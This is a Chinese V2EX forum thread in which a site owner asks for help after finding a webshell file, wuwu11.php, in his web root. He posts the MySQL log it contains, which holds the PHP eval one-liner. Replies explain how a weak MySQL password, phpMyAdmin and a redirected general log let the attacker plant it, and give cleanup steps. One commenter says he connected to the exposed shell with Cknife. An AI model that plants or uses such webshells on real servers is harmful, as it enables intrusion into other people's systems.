求助各位 v 友,网站根目录多了一个 wuwu11. PHP 的文件

2018-03-31 08:56:34 +08:00
 fzxml

阿里云云盾检测到发现后门 webshell 根目录多了一个 wuwu11.php 的文件, 内容是:

D:\web\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
		65264 Init DB	mysql
		65264 Query	SHOW TABLES FROM `mysql`
		65264 Query	SHOW TABLE STATUS FROM `mysql`
		65264 Query	SELECT CURRENT_USER()
		65264 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
		65264 Query	SELECT CURRENT_USER()
		65264 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
		65264 Quit	
180330 19:55:36	65265 Connect	root@localhost on 
		65265 Query	SET NAMES 'utf8' COLLATE 'utf8_general_ci'
		65265 Init DB	mysql
		65265 Init DB	mysql
		65265 Query	select '<?php @eval($_POST[h])?>'
		65265 Init DB	mysql
		65265 Query	SHOW TABLES FROM `mysql`
		65265 Query	SHOW TABLE STATUS FROM `mysql`
		65265 Query	SELECT CURRENT_USER()
		65265 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
		65265 Query	SELECT CURRENT_USER()
		65265 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
		65265 Query	SHOW TABLES
		65265 Quit	
180330 19:55:37	65266 Connect	root@localhost on 
		65266 Query	SET NAMES 'utf8' COLLATE 'utf8_general_ci'
		65266 Init DB	mysql
		65266 Init DB	mysql
		65266 Query	set global general_log = 'Off'
5656 次点击
所在节点    PHP
15 条回复
111111111111
2018-03-31 09:17:27 +08:00
注入漏洞吧,服务器权限也没设置
cyn
2018-03-31 09:21:06 +08:00
只会执行<?php @eval($_POST[h])?> 吗?
wukaichao
2018-03-31 09:25:17 +08:00
注入吧,直接在读表了。
kuzhan
2018-03-31 09:26:33 +08:00
都脱裤了 还问
zjsxwc
2018-03-31 09:29:20 +08:00
这个吗?

http://www.hanyadichan.com/
honkew
2018-03-31 09:53:16 +08:00
@zjsxwc 竟然发出来了,我用 Cknife 连了一下 可以连上
Les1ie
2018-03-31 12:42:37 +08:00
@honkew V2EX 上发自己服务器的一句话木马 翻车现场
janus77
2018-03-31 12:46:36 +08:00
哈哈哈哈哈
sinver
2018-03-31 12:52:07 +08:00
phpmyadmin 及各种弱口令.....感觉重装系统 及重新搭建网站和权限控制吧....
fange01
2018-03-31 13:00:34 +08:00
@Les1ie 翻车现场,竟然还不处理。
@honkew 哈哈哈哈
lifeintools
2018-03-31 14:05:00 +08:00
还有网站源码。。你还不设置权限。。。。。
xuyl
2018-03-31 20:24:01 +08:00
php 码农安全意识堪忧啊。
Tink
2018-03-31 23:22:25 +08:00
fanglongzong
2018-04-06 10:16:42 +08:00
跟楼主一模一样的情况。

完全是技术小白,不知道要怎么办……
maoxs2
2018-08-20 15:51:16 +08:00
1. 不是我搞得,只是碰巧碰见了这个后门好几回
2. 攻击点是 MySQL 弱密码+phpMyAdmin
3. 注入点是日志文档保存路径修改至 apache 服务器解析文件夹(通过 phpinfo 获得 /phpstudy 等框架猜解)
4. 解决方法删除它后续步骤放的别的后门程序( exe+服务),删除 wuwu11,修改 MySQL 弱密码,删掉 phpMyAdmin 或者修改路径或者加 http 认证啥的

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/443025

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX